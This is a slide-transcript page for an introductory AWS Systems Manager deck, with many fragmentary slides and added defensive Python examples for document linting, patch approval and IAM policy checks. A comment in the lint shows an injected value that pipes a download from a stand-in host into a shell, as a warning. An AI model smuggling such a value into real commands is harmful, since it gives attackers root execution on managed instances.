Introduction to AWS Systems Manager (AWS Systems manager 入門)

Posted on 21-Jan-2018

Category: Services

TRANSCRIPT

  1. Amazon EC2 Systems Manager, Amazon EC2, 2017/06
  2. Agenda: Amazon EC2 Systems Manager / Amazon EC2 Systems Manager / Amazon EC2 Systems Manager / Amazon EC2 Systems Manager
  3.
  4.
  5.
  6. AWS, Excel, AWS
  7. Amazon EC2 Systems Manager
  8. Amazon EC2 Systems Manager: OS (Windows, Linux), AWS Config, AWS Systems Manager, OS
  9. Amazon EC2 Systems Manager: Systems Manager, Run Command
  10. Run Command: JSON, S3, SNS, SSH/RDP, Cloud Automator
  11. Run Command
  12. OS, OS, JSON (custom documents), EC2
  13.
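Added example, not from the original deck: a custom Command document in the JSON format slide 12 refers to (schemaVersion 2.2, one aws:runShellScript step), together with a small lint a practitioner would run before `aws ssm create-document`. The unit name, step name and parameter names are made up for the demo. The check enforces that every `{{ parameter }}` spliced into a runShellScript line is declared and constrained with allowedPattern or allowedValues: Run Command substitutes parameter values textually into the command line and the agent runs as root (or SYSTEM), so an unconstrained parameter lets anyone allowed to invoke the document run arbitrary commands on every target.

```python
"""Custom SSM Command document plus a pre-publish lint for parameter
interpolation (constructed example, not code from the deck)."""
import copy
import json
import re

# Constructed document: restart a systemd unit named by a parameter.
EXAMPLE_DOCUMENT = {
    "schemaVersion": "2.2",
    "description": "Restart a systemd unit on Linux targets (constructed example).",
    "parameters": {
        "unitName": {
            "type": "String",
            "description": "systemd unit to restart",
            "default": "nginx.service",
            # Without this, a caller could pass "x; curl http://evil | sh".
            "allowedPattern": "^[A-Za-z0-9@._-]+$",
        },
        "waitSeconds": {
            "type": "String",
            "default": "5",
            "allowedPattern": "^[0-9]{1,3}$",
        },
    },
    "mainSteps": [
        {
            "action": "aws:runShellScript",
            "name": "restartUnit",
            "inputs": {
                "timeoutSeconds": "120",
                "runCommand": [
                    "systemctl restart {{ unitName }}",
                    "sleep {{ waitSeconds }}",
                    "systemctl is-active {{ unitName }}",
                ],
            },
        }
    ],
}

PLACEHOLDER = re.compile(r"\{\{\s*([A-Za-z0-9_]+)\s*\}\}")
SHELL_ACTIONS = {"aws:runShellScript", "aws:runPowerShellScript"}


def referenced_parameters(doc):
    """Map each {{ name }} used in a shell step to the step names that use it."""
    refs = {}
    for step in doc.get("mainSteps", []):
        if step.get("action") not in SHELL_ACTIONS:
            continue
        for line in step.get("inputs", {}).get("runCommand", []):
            for name in PLACEHOLDER.findall(line):
                refs.setdefault(name, set()).add(step["name"])
    return refs


def lint_document(doc):
    """Return findings as strings; an empty list means the document passes."""
    findings = []
    if doc.get("schemaVersion") != "2.2":
        findings.append("schemaVersion: must be 2.2 for a multi-step Command document")
    declared = doc.get("parameters", {})
    for name, steps in referenced_parameters(doc).items():
        where = ",".join(sorted(steps))
        if name not in declared:
            findings.append(f"{name}: used in {where} but not declared in parameters")
        elif not ({"allowedPattern", "allowedValues"} & set(declared[name])):
            findings.append(f"{name}: interpolated into a shell command in {where} "
                            "without allowedPattern/allowedValues")
    return findings


def document_json(doc):
    """Content for: aws ssm create-document --name <name> --content file://doc.json"""
    return json.dumps(doc, indent=2)


# Constructed negative case: the pattern is dropped and an undeclared
# parameter is spliced into the shell line.
UNSAFE_DOCUMENT = copy.deepcopy(EXAMPLE_DOCUMENT)
del UNSAFE_DOCUMENT["parameters"]["unitName"]["allowedPattern"]
UNSAFE_DOCUMENT["mainSteps"][0]["inputs"]["runCommand"].append("echo {{ undeclared }}")

if __name__ == "__main__":
    print("safe document:", lint_document(EXAMPLE_DOCUMENT))
    print("unsafe document:", lint_document(UNSAFE_DOCUMENT))
```

The lint only looks at runShellScript and runPowerShellScript steps, because those are the ones where a parameter value becomes part of a command line; pair it with a resource-scoped IAM policy on ssm:SendCommand so that the document can only be run against the intended instances.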
  14. EC2, AWS, JSON, AWS Config (Inventory)
  15.
  16. AWS Config, SSM
  17. OS etc., Run Command, RDS, Maintenance Window, Cloud Automator
  18.
  19. 3, Maintenance Window
  20. Cron
  21. Cron
  22.
  23.
  24.
  25.
  26. Windows, Patch Baseline, 1, Maintenance Window
  27.
  28.
  29.
  30.
  31. Amazon Machine Images (AMI): AMI, EC2, AMI, JSON
  32.
  33. IT, DB, Run Command, State Manager, Automation, Management Console, AWS CLI, SDK, Parameter Store, KMS
  34.
  35. KMS
  36. Parameters are read from Run Command, Automation and State Manager, or with the AWS CLI. Plain-text parameter (AWS CLI):
      aws ssm get-parameters --names <parameter-name>
      KMS-encrypted SecureString parameter, decrypted on read (AWS CLI):
      aws ssm get-parameters --names <parameter-name> --with-decryption
      (<parameter-name> is a placeholder for the parameter's name.)
  37. IAM policies that separate environments by parameter-name prefix (account ID as on the slide):
      {
        "Version": "2012-10-17",
        "Statement": [
          {
            "Effect": "Allow",
            "Action": ["ssm:Describe*", "ssm:Get*", "ssm:List*"],
            "Resource": ["arn:aws:ssm:ap-northeast-1:123456789123:parameter/prd.*"]
          }
        ]
      }
      {
        "Version": "2012-10-17",
        "Statement": [
          {
            "Effect": "Allow",
            "Action": ["ssm:Describe*", "ssm:Get*", "ssm:List*"],
            "Resource": ["arn:aws:ssm:ap-northeast-1:123456789123:parameter/test.*"]
          }
        ]
      }
      Note that ssm:DescribeParameters does not support resource-level permissions, so the Describe* entry only takes effect with "Resource": "*"; the parameter ARN restricts the Get* and List* calls, and reading a SecureString with --with-decryption additionally requires kms:Decrypt on the key.
  38. Systems Manager documents, AWS
  39. [Command], [Policy], [Automation]: 3 document types
  40. Command: Run Command / Policy / Automation
  41. Amazon EC2 Systems Manager
  42. SSM Agent: Systems Manager, SSM Agent, AWS API. AWS AMIs: Windows AMIs from 2016-11 (2003-2012 R2, 2016) and Amazon Linux. Source code on GitHub: https://github.com/aws/amazon-ssm-agent
  43. EC2 Systems Manager supported OS:
      Windows (32-bit, 64-bit): Windows Server 2003 to 2016 (R2)
      Linux (32-bit): Amazon Linux 2014.09, 2014.03; Ubuntu Server 16.04 LTS, 14.04 LTS, 12.04 LTS; Red Hat Enterprise Linux (RHEL) 6.5; CentOS 6.3
      Linux (64-bit): Amazon Linux 2015.09, 2015.03; Red Hat Enterprise Linux (RHEL) 7.x; CentOS 7.1
  44. EC2 Systems Manager: the SSM Agent calls the API outbound; API endpoints on ports 80 and 443; NAT Gateway
  45. EC2 Systems Manager: SSM, SSM (as of 2017/06/23). OS account the agent runs as: Windows: system, Linux: root
  46. IAM Role: an EC2 IAM Role is needed for the SSM Agent's API calls; Automation additionally needs ec2:CreateImage. AWS managed policies: AmazonSSMFullAccess, AmazonSSMReadOnlyAccess
  47. IAM Role: an IAM Role can be attached to an existing EC2 instance (2017/02/12) https://aws.amazon.com/jp/blogs/news/new-attach-an-aws-iam-role-to-an-existing-amazon-ec2-instance-by-using-the-aws-cli/
  48. Amazon EC2 Systems Manager, EC2
  49. SSM Agent (Windows on EC2): AWS Windows AMIs from 2016-11 include SSM Agent; earlier Windows AMIs have EC2Config, updated with Run Command AWS-UpdateEC2Config; Windows Server 2016: AWS-UpdateSSMAgent
  50. SSM Agent (Windows on EC2)
  51. SSM Agent (Windows on EC2): Windows Server 2016: AWS-UpdateSSMAgent; Windows Server 2012: AWS-UpdateEC2Config
  52. SSM Agent (Windows on EC2)
  53. SSM Agent (Windows on EC2): Run
  54. SSM Agent (Windows on EC2)
  55. SSM Agent (Windows on EC2)
  56. SSM Agent (Windows on EC2)
  57. SSM Agent (Windows on EC2)
  58. SSM Agent (Windows on EC2)
  59. SSM Agent (Linux on EC2): download SSM Agent from S3: https://amazon-ssm-region.s3.amazonaws.com/latest/$arch/amazon-ssm-agent.rpm (replace "region" with the Region and $arch with the architecture). Install:
      sudo yum install -y amazon-ssm-agent.rpm
      sudo dpkg -i amazon-ssm-agent.deb
      Docs: http://docs.aws.amazon.com/ja_jp/systems-manager/latest/userguide/ssm-agent.html
  60. SSM Agent (Linux on EC2): download URLs (S3, ap-northeast-1):
      Amazon Linux / RHEL / CentOS 64-bit: https://s3.ap-northeast-1.amazonaws.com/amazon-ssm-ap-northeast-1/latest/linux_amd64/amazon-ssm-agent.rpm
      Amazon Linux / RHEL / CentOS 32-bit: https://s3.ap-northeast-1.amazonaws.com/amazon-ssm-ap-northeast-1/latest/linux_386/amazon-ssm-agent.rpm
      Ubuntu Server 64-bit: https://s3.ap-northeast-1.amazonaws.com/amazon-ssm-ap-northeast-1/latest/debian_amd64/amazon-ssm-agent.deb
      Ubuntu Server 32-bit: https://s3.ap-northeast-1.amazonaws.com/amazon-ssm-ap-northeast-1/latest/debian_386/amazon-ssm-agent.deb
  61. Amazon EC2 Systems Manager
  62. Systems Manager
  63.
  64. IAM
  65.
  66.
  67. Systems Manager, AWS
  68. role: Systems Manager, AWS, IAM
  69. [Amazon EC2 Role for Simple Systems Manager]
  70. AmazonEC2RoleforSSM
  71.
  72. Trust policy of the role:
      {
        "Version": "2012-10-17",
        "Statement": {
          "Effect": "Allow",
          "Principal": {"Service": "ssm.amazonaws.com"},
          "Action": "sts:AssumeRole"
        }
      }
  73. Windows: install [AWS Tools for Windows PowerShell] https://aws.amazon.com/jp/powershell/
  74. Windows: run in Windows PowerShell for AWS (placeholders: code = activation code, id = activation ID, region = the Region where Systems Manager is used):
      $dir = $env:TEMP + "\ssm"
      New-Item -ItemType directory -Path $dir
      cd $dir
      (New-Object System.Net.WebClient).DownloadFile("https://amazon-ssm-region.s3.amazonaws.com/latest/windows_amd64/AmazonSSMAgentSetup.exe", $dir + "\AmazonSSMAgentSetup.exe")
      Start-Process .\AmazonSSMAgentSetup.exe -ArgumentList @("/q", "/log", "install.log", "CODE=code", "ID=id", "REGION=region") -Wait
      Get-Content ($env:ProgramData + "\Amazon\SSM\InstanceData\registration")
      Get-Service -Name "AmazonSSMAgent"
  75. Windows
  76. Managed instance ID: [mi-]
  77.
  78. Linux (placeholders: code = activation code, id = activation ID, region = the Region where Systems Manager is used)
  79. Linux, Amazon Linux / RHEL 6.x / CentOS 6.x:
      mkdir /tmp/ssm
      sudo curl https://s3.amazonaws.com/ec2-downloads-windows/SSMAgent/latest/linux_amd64/amazon-ssm-agent.rpm -o /tmp/ssm/amazon-ssm-agent.rpm
      sudo yum install -y /tmp/ssm/amazon-ssm-agent.rpm
      sudo stop amazon-ssm-agent
      sudo amazon-ssm-agent -register -code "code" -id "id" -region "region"
      sudo start amazon-ssm-agent
  80. Linux, RHEL 7.x / CentOS 7.x:
      mkdir /tmp/ssm
      sudo curl https://s3.amazonaws.com/ec2-downloads-windows/SSMAgent/latest/linux_amd64/amazon-ssm-agent.rpm -o /tmp/ssm/amazon-ssm-agent.rpm
      sudo yum install -y /tmp/ssm/amazon-ssm-agent.rpm
      sudo systemctl stop amazon-ssm-agent
      sudo amazon-ssm-agent -register -code "code" -id "id" -region "region"
      sudo systemctl start amazon-ssm-agent
  81. Linux, Ubuntu:
      mkdir /tmp/ssm
      sudo curl https://s3.amazonaws.com/ec2-downloads-windows/SSMAgent/latest/debian_amd64/amazon-ssm-agent.deb -o /tmp/ssm/amazon-ssm-agent.deb
      sudo dpkg -i /tmp/ssm/amazon-ssm-agent.deb
      sudo service amazon-ssm-agent stop
      sudo amazon-ssm-agent -register -code "code" -id "id" -region "region"
      sudo service amazon-ssm-agent start
  82. Linux (RHEL 7.3)
  83. Managed instance ID: mi-
  84. Amazon EC2 Systems Manager
  85. Amazon EC2 Systems Manager: Windows, IT, AMI
  86. Windows: Systems Manager, Windows
  87. Windows: Systems Manager, IAM
  88. Windows: [AWS service]-[Amazon EC2]
  89. Windows: [AmazonSSMMaintenanceWindowRole]
  90. Windows
  91. Windows: IAM
  92. Windows: trust relationship [ssm.amazonaws.com]
      {
        "Version": "2012-10-17",
        "Statement": [
          {
            "Sid": "",
            "Effect": "Allow",
            "Principal": {"Service": ["ec2.amazonaws.com", "ssm.amazonaws.com"]},
            "Action": "sts:AssumeRole"
          }
        ]
      }
      (Two service principals must be written as a list under one "Service" key; a JSON object with the key "Service" twice is not valid, and most parsers keep only the last value, silently dropping one of the principals.)
  93. Windows: IAM [ssm.amazonaws.com]
  94. Windows
  95. Windows: approval rule: Product, OS, Classification, Severity, Auto Approval Delay
  96. Windows
  97. Windows: tag the EC2 instances with [Patch Group]
  98. Windows: [Patch Group]
  99. Windows
  100. Windows
  101. Windows: Patch Group
  102. Windows
  103. Windows: [AWS-ApplyPatchBaseline]
  104. Windows: Operation [Scan] or [Install]. Scan: ; Install: ; Patch Manager, Systems Manager
  105. Windows: IAM
  106. Windows
  107. Windows: / [AWS-ApplyPatchBaseline]
  108. Windows: AMI, AMI, Cloud Automator
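Added example, not from the deck: a model of how a Patch Manager approval rule (Product, Classification, MSRC severity and auto-approval delay, as on slide 95) decides which patches are approved on a given scan date, with the explicit ApprovedPatches and RejectedPatches lists taking precedence over the rules. The baseline uses the JSON shape accepted by `aws ssm create-patch-baseline --approval-rules`; the KB IDs and release dates are constructed. The real service also tracks compliance levels and further filter keys that are not modelled here.

```python
"""Patch baseline approval-rule evaluation (constructed example)."""
from datetime import date, timedelta

# Baseline in create-patch-baseline --approval-rules form (constructed).
BASELINE = {
    "ApprovalRules": {
        "PatchRules": [
            {
                "PatchFilterGroup": {
                    "PatchFilters": [
                        {"Key": "PRODUCT", "Values": ["WindowsServer2012R2", "WindowsServer2016"]},
                        {"Key": "CLASSIFICATION", "Values": ["SecurityUpdates", "CriticalUpdates"]},
                        {"Key": "MSRC_SEVERITY", "Values": ["Critical", "Important"]},
                    ]
                },
                # Auto Approval Delay: approved this many days after release.
                "ApproveAfterDays": 7,
            }
        ]
    },
    "ApprovedPatches": ["KB0000003"],  # explicit allow-list (constructed IDs)
    "RejectedPatches": ["KB0000002"],  # explicit block-list, wins over rules
}

# Constructed patch metadata: (KB id, product, classification, severity, release date)
PATCHES = [
    ("KB0000001", "WindowsServer2016", "SecurityUpdates", "Critical", date(2017, 6, 1)),
    ("KB0000002", "WindowsServer2016", "SecurityUpdates", "Critical", date(2017, 6, 1)),
    ("KB0000003", "WindowsServer2016", "Updates", "Unspecified", date(2017, 5, 1)),
    ("KB0000004", "WindowsServer2016", "SecurityUpdates", "Important", date(2017, 6, 20)),
    ("KB0000005", "WindowsServer2012", "SecurityUpdates", "Critical", date(2017, 5, 1)),
]

# Which tuple field each filter key inspects.
FIELD_FOR_KEY = {"PRODUCT": 1, "CLASSIFICATION": 2, "MSRC_SEVERITY": 3}


def rule_matches(rule, patch):
    """All filters in a PatchFilterGroup must match (a '*' value matches anything)."""
    filters = rule["PatchFilterGroup"]["PatchFilters"]
    return all("*" in f["Values"] or patch[FIELD_FOR_KEY[f["Key"]]] in f["Values"]
               for f in filters)


def approval_state(baseline, patch, on):
    """'approved', 'pending' (rule matched, still inside the delay), 'rejected'
    or 'not-applicable' for one patch as of date `on`."""
    kb, release = patch[0], patch[4]
    if kb in baseline.get("RejectedPatches", []):
        return "rejected"
    if kb in baseline.get("ApprovedPatches", []):
        return "approved"
    for rule in baseline["ApprovalRules"]["PatchRules"]:
        if rule_matches(rule, patch):
            delay = timedelta(days=rule.get("ApproveAfterDays", 0))
            return "approved" if release + delay <= on else "pending"
    return "not-applicable"


def evaluate(baseline, patches, on):
    """Map KB id -> state for all patches; `on` is a date or an ISO date string."""
    if isinstance(on, str):
        on = date.fromisoformat(on)
    return {p[0]: approval_state(baseline, p, on) for p in patches}


if __name__ == "__main__":
    for kb, state in evaluate(BASELINE, PATCHES, "2017-06-23").items():
        print(kb, state)
```

Running the evaluation on two dates shows the effect of the delay: a patch released on 2017-06-20 is still pending on 2017-06-23 and becomes approved on 2017-06-27, which is the window an attacker has between a public security update and its automatic rollout through AWS-ApplyPatchBaseline.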
  109. IT: Systems Manager
  110. IT
  111. IT
  112. IT
  113. IT: 30
  114. IT
  115. IT: [S3]
  116. IT
  117. IT: [inventory Type]
  118. IT: AWS Config
  119. IT
  120. IT
  121. AMI: AMI, AMI http://docs.aws.amazon.com/ja_jp/systems-manager/latest/userguide/sysman-ami-consolewalk.html
  122. AMI: Systems Manager Automation, IAM. Two IAM roles are needed: one for Automation and one for the EC2 instance. http://docs.aws.amazon.com/ja_jp/systems-manager/latest/userguide/sysman-ami-consolewalk.html
  123. AMI: IAM
  124. AMI: [AWS service]-[Amazon EC2]
  125. AMI: [AmazonSSMAutomationRole]
  126. AMI: Automation
  127. AMI: role ARN
  128. AMI: [Automation] IAM
  129. AMI: trust relationship [ssm.amazonaws.com]
      {
        "Version": "2012-10-17",
        "Statement": [
          {
            "Sid": "",
            "Effect": "Allow",
            "Principal": {"Service": ["ec2.amazonaws.com", "ssm.amazonaws.com"]},
            "Action": "sts:AssumeRole"
          }
        ]
      }
      (Both service principals go in one list under a single "Service" key; repeating the key in one JSON object leaves only one principal after parsing.)
  130. AMI: IAM [ssm.amazonaws.com]
  131. AMI: EC2 IAM
  132. AMI: [AWS service]-[Amazon EC2]
  133. AMI: [AmazonEC2RoleforSSM]
  134. AMI: EC2
  135. AMI: trust relationship [ssm.amazonaws.com]: the same trust policy as in slide 129 (Service list of ec2.amazonaws.com and ssm.amazonaws.com)
  136. AMI: IAM [ssm.amazonaws.com]
  137. AMI: [EC2] IAM
  138. AMI: trust relationship [ssm.amazonaws.com]: the same trust policy as in slide 129 (Service list of ec2.amazonaws.com and ssm.amazonaws.com)
  139. AMI: IAM [ssm.amazonaws.com]
  140. AMI: [Automation] IAM
  141. AMI: PassRole. The Automation role needs iam:PassRole for the EC2 instance IAM role, scoped to that one role rather than "*":
      {
        "Version": "2012-10-17",
        "Statement": [
          {
            "Effect": "Allow",
            "Action": ["iam:PassRole"],
            "Resource": ["arn:aws:iam::xxxxxxxxxxx:role/AmazonEC2RoleforSSM"]
          }
        ]
      }
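Added example, not from the deck, covering the IAM JSON in slides 37, 92, 129 to 138 and 141: a loader that rejects duplicate keys (the trust policies above were originally written with "Service" twice in one object, which most parsers silently collapse to a single principal), a helper that lists the service principals a trust policy admits, and a minimal Allow/Deny evaluator with IAM `*`/`?` wildcard matching, used to confirm that the prd.* Parameter Store policy cannot read test.* parameters and that the PassRole grant covers only AmazonEC2RoleforSSM. Account IDs are placeholders. The evaluator ignores Condition, NotAction, NotResource and cross-account rules, so it is a pre-deploy sanity check, not a substitute for the IAM policy simulator.

```python
"""IAM policy loading and evaluation checks (constructed example)."""
import fnmatch
import json


def _reject_duplicates(pairs):
    obj = {}
    for key, value in pairs:
        if key in obj:
            raise ValueError(f"duplicate key {key!r} in policy object")
        obj[key] = value
    return obj


def load_policy(text):
    """json.loads keeps only the last of two identical keys; this refuses instead."""
    return json.loads(text, object_pairs_hook=_reject_duplicates)


def _as_list(value):
    return value if isinstance(value, list) else [value]


def trusted_services(trust_policy):
    """Service principals that an Allow/sts:AssumeRole statement lets assume the role."""
    services = set()
    for st in _as_list(trust_policy["Statement"]):
        if st.get("Effect") != "Allow" or "sts:AssumeRole" not in _as_list(st.get("Action", [])):
            continue
        principal = st.get("Principal", {})
        if isinstance(principal, dict):
            services.update(_as_list(principal.get("Service", [])))
    return services


def allows(policy, action, resource):
    """Explicit Deny wins; otherwise any Allow whose Action and Resource match grants."""
    granted = False
    for st in _as_list(policy["Statement"]):
        # Action names are case-insensitive; ARNs are case-sensitive.
        act = any(fnmatch.fnmatchcase(action.lower(), a.lower()) for a in _as_list(st.get("Action", [])))
        res = any(fnmatch.fnmatchcase(resource, r) for r in _as_list(st.get("Resource", [])))
        if act and res:
            if st.get("Effect") == "Deny":
                return False
            granted = True
    return granted


# Trust policy with "Service" twice in one object, as the slides had it.
TRUST_WITH_DUPLICATE_KEY = """{"Version": "2012-10-17", "Statement": [{"Sid": "",
  "Effect": "Allow", "Principal": {"Service": "ec2.amazonaws.com", "Service": "ssm.amazonaws.com"},
  "Action": "sts:AssumeRole"}]}"""

# The same intent written correctly: one key holding a list.
TRUST_FIXED = """{"Version": "2012-10-17", "Statement": [{"Effect": "Allow",
  "Principal": {"Service": ["ec2.amazonaws.com", "ssm.amazonaws.com"]},
  "Action": "sts:AssumeRole"}]}"""

# Parameter Store read policy for the prd.* namespace (placeholder account ID).
PARAM_POLICY_PRD = """{"Version": "2012-10-17", "Statement": [{"Effect": "Allow",
  "Action": ["ssm:Describe*", "ssm:Get*", "ssm:List*"],
  "Resource": ["arn:aws:ssm:ap-northeast-1:123456789012:parameter/prd.*"]}]}"""

# PassRole limited to the one instance role the Automation role may hand to EC2.
PASSROLE_POLICY = """{"Version": "2012-10-17", "Statement": [{"Effect": "Allow",
  "Action": ["iam:PassRole"],
  "Resource": ["arn:aws:iam::123456789012:role/AmazonEC2RoleforSSM"]}]}"""

ARN_PREFIX = "arn:aws:ssm:ap-northeast-1:123456789012:parameter/"


def demo():
    # Plain json.loads accepts the duplicate and keeps only the last value.
    lost = trusted_services(json.loads(TRUST_WITH_DUPLICATE_KEY))
    try:
        load_policy(TRUST_WITH_DUPLICATE_KEY)
        rejected = False
    except ValueError:
        rejected = True
    prd = load_policy(PARAM_POLICY_PRD)
    passrole = load_policy(PASSROLE_POLICY)
    return {
        "silently_loaded_services": lost,
        "duplicate_key_rejected": rejected,
        "fixed_services": trusted_services(load_policy(TRUST_FIXED)),
        "prd_reads_prd": allows(prd, "ssm:GetParameters", ARN_PREFIX + "prd.db.password"),
        "prd_reads_test": allows(prd, "ssm:GetParameters", ARN_PREFIX + "test.db.password"),
        "passrole_instance_role": allows(passrole, "iam:PassRole",
                                         "arn:aws:iam::123456789012:role/AmazonEC2RoleforSSM"),
        "passrole_other_role": allows(passrole, "iam:PassRole",
                                      "arn:aws:iam::123456789012:role/Admin"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The duplicate-key case is the one to take away: `json.loads` on the slide's trust policy returns a role trusted only by ssm.amazonaws.com, so an EC2 instance could never assume it and the failure would surface later as an opaque "not authorized" error; loading with the strict hook turns that into an immediate error at review time.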
  142. AMI: AMI, AMI, source AMI ID
  143. AMI
  144. AMI: [AWS-UpdateLinuxAmi] [1]
  145. AMI
  146. AMI: Automation parameters
      SourceAmiId: source AMI ID
      InstanceIamRole: EC2 instance IAM role
      AutomationAssumeRole: Automation IAM role ARN
      TargetAmiName: name of the AMI to create
      InstanceType
      PreUpdateScript: URL
      PostUpdateScript: URL
      IncludePackages
      ExcludePackages
  147. AMI
  148. AMI: [InProgress]
  149. AMI: the new AMI
  150. AMI: output AMI ID; Lambda, AMI ID; Automation, Lambda, Parameter Store, AMI, AMI, Auto Scaling
  151.
  152. Systems Manager, AWS / OS, Systems Manager, JSON
  153. JSON
  154. Systems Manager and Cloud Automator: Systems Manager requires IAM and JSON; Cloud Automator provides a GUI; Systems Manager, Cloud Automator, SQS, OS, SSM, SSM
  155.
  156. Systems Manager, Systems Manager